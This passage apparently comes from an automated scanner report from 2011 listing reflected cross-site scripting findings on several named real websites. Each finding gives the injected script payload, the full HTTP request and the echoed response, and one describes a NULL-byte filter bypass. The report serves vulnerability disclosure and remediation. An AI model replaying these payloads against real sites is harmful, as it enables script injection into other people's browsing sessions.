Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1" title="RateDesi Forums | Site Profile"> ...[SNIP]...
1.115. http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Research_Learn_Message_Boards_1404604.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7999"><script>alert(1)</script>ffa4f5f1626 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:54 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:13:55 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html?b7999"><script>alert(1)</script>ffa4f5f1626=1" title="Research & Learn Message Boards - AOL Message Boards | Site Profile"> ...[SNIP]...
1.116. http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Sherdog_Mixed_Martial_Arts_For_14952.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced5c"><script>alert(1)</script>6a0288545dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:20:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html?ced5c"><script>alert(1)</script>6a0288545dc=1" title="Sherdog Mixed Martial Arts Forums | Site Profile"> ...[SNIP]...
1.117. http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/The_CafeMom_Newcomers_Club_Gro_655408.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e6f5"><script>alert(1)</script>40022661852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:08 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html?1e6f5"><script>alert(1)</script>40022661852=1" title="The CafeMom Newcomers Club Group - CafeMom | Site Profile"> ...[SNIP]...
1.118. http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/The_Mastiff_Sweet_Spot_6024491.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1e18"><script>alert(1)</script>6e380957a50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html?c1e18"><script>alert(1)</script>6e380957a50=1" title="The Mastiff Sweet Spot | Site Profile"> ...[SNIP]...
1.119. http://boardreader.com/site/UFC_Community_Forum_9057873.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/UFC_Community_Forum_9057873.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7eb29"><script>alert(1)</script>110fab5c39e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/UFC_Community_Forum_9057873.html?7eb29"><script>alert(1)</script>110fab5c39e=1" title="UFC Community Forum | Site Profile"> ...[SNIP]...
1.120. http://boardreader.com/site/Ultimate_College_Softball_5898982.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Ultimate_College_Softball_5898982.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b11b"><script>alert(1)</script>5da4301906 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:10:49 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 13:10:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Ultimate_College_Softball_5898982.html?5b11b"><script>alert(1)</script>5da4301906=1" title="Ultimate College Softball | Site Profile"> ...[SNIP]...
1.121. http://boardreader.com/site/mntdiat_mai_aigi_7486781.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/mntdiat_mai_aigi_7486781.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e1ca"><script>alert(1)</script>c60cedb11b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:01 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/mntdiat_mai_aigi_7486781.html?3e1ca"><script>alert(1)</script>c60cedb11b4=1" title=".............. ...... ........ | Site Profile"> ...[SNIP]...
1.122. http://consumershealthyliving.com/clinical-study.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://consumershealthyliving.com
Path: /clinical-study.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15882"><a>3a9ae0f5291 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /clinical-study.html?15882"><a>3a9ae0f5291=1 HTTP/1.1
Host: consumershealthyliving.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: af0de5e19d0aeec9236a3a01ce912df8=n0799snp41r1h1s86rdk7kmg30; path=/
Last-Modified: Tue, 01 Feb 2011 15:31:26 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25570
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > ...[SNIP]... <a href="http://consumershealthyliving.com/clinical-study.html?15882"><a>3a9ae0f5291=1&fontstyle=f-larger" title="Increase Font Size" class="large"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %0082f2d<a>e2e94140c60 was submitted in the REST URL parameter 1. This input was echoed as 82f2d<a>e2e94140c60 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%0082f2d<a>e2e94140c60/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:00 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1644
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5fd5"><script>alert(1)</script>73be2182441 was submitted in the REST URL parameter 1. This input was echoed as b5fd5"><script>alert(1)</script>73be2182441 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%00b5fd5"><script>alert(1)</script>73be2182441/2006/06/again/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:32:59 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1790
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 269cf<a>57679d84bdc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/06/again269cf<a>57679d84bdc/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Tue, 01 Feb 2011 15:33:37 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Tue, 01 Feb 2011 15:33:37 GMT
Last-Modified: Tue, 01 Feb 2011 15:33:37 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
1.126. http://dean.edwards.name/weblog/2006/06/again/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/06/again/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b483d"><script>alert(1)</script>e257170cefc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b483d\"><script>alert(1)</script>e257170cefc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/06/again/?b483d"><script>alert(1)</script>e257170cefc=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 592e2<script>alert(1)</script>9fd54abbf1d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/p.json?callback=_ate.ad.hpr592e2<script>alert(1)</script>9fd54abbf1d HTTP/1.1
Host: ds.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 311
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 01 Feb 2011 15:32:28 GMT; Path=/
Set-Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; Domain=.addthis.com; Expires=Mon, 02 May 2011 15:32:28 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 03 Mar 2011 15:32:28 GMT; Path=/
Set-Cookie: di=%7B%7D..1296574348.19F|1296574348.19A; Domain=.addthis.com; Expires=Thu, 31-Jan-2013 04:49:40 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Tue, 01 Feb 2011 15:32:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 01 Feb 2011 15:32:28 GMT
Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1cee6<script>alert(1)</script>ded05b5064d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.ehow.com/p.json?callback=_ate.ad.hpr1cee6<script>alert(1)</script>ded05b5064d&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ehow.com%2Fcomputer-software%2F&ref=http%3A%2F%2Fburp%2Fshow%2F4&o1jt6o HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh30.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296507257.60|1293848200.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 290
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 02 Feb 2011 15:32:00 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 04 Mar 2011 15:32:00 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296660720.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 01-Feb-2013 11:36:19 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 02 Feb 2011 15:32:00 GMT
Connection: close
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload c49f0<script>alert(1)</script>f5a6d19584e was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /data/service-calendar.json?widget_query=true&zipcode=All&year=2009&month=10&day=12&max=4&widget_category_id=0&widget_category=All&jsoncallback=jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e&_=1255386319932 HTTP/1.1
Host: gocitykids.parentsconnect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Language: en
Content-Type: text/json;charset=UTF-8
Content-Length: 20190
Date: Wed, 02 Feb 2011 19:21:09 GMT
Connection: close
jsonp1255386312275c49f0<script>alert(1)</script>f5a6d19584e( [{"id":"211700","name":"Groundhog Day (PG)","attractionAlias":"the-colonial-theatre-227-bridge-street-phoenixville-pa-19460-3449-us","phone":"610.917.0223; 610.917.1228","url":"http://www.thecoloni ...[SNIP]...
1.130. http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/database-soup
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9deb'-alert(1)-'530e4bffa2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-soup?e9deb'-alert(1)-'530e4bffa2c=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 61209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:42 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database So ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-soup%26e9deb'-alert(1)-'530e4bffa2c%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.131. http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/database-talk
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9726'-alert(1)-'362cf24ba31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/database-talk?e9726'-alert(1)-'362cf24ba31=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 63475
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:40 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Ta ...[SNIP]... aBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddatabase-talk%26e9726'-alert(1)-'362cf24ba31%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
document.getElementById('ctaimage').src = ckUrl;
...[SNIP]...
1.132. http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.toolbox.com
Path: /blogs/db2luw
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29327'-alert(1)-'14b42306d5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blogs/db2luw?29327'-alert(1)-'14b42306d5d=1 HTTP/1.1
Host: it.toolbox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 62990
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 14:26:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> An Expert's ...[SNIP]... r != ctaBtnClicked) { ctaBtnClicked = sender; ctaDtClicked = new Date(); var myUrl = 'http%3a%2f%2fit.toolbox.com%2fblogs%2fBlogMain.aspx%3fslug%3ddb2luw%2629327'-alert(1)-'14b42306d5d%3d1'; ckUrl = 'http://it.toolbox.com/api/ctatools/CreateCookie.aspx?CTAPage=' + myUrl + '&CTA=' + ctaName;
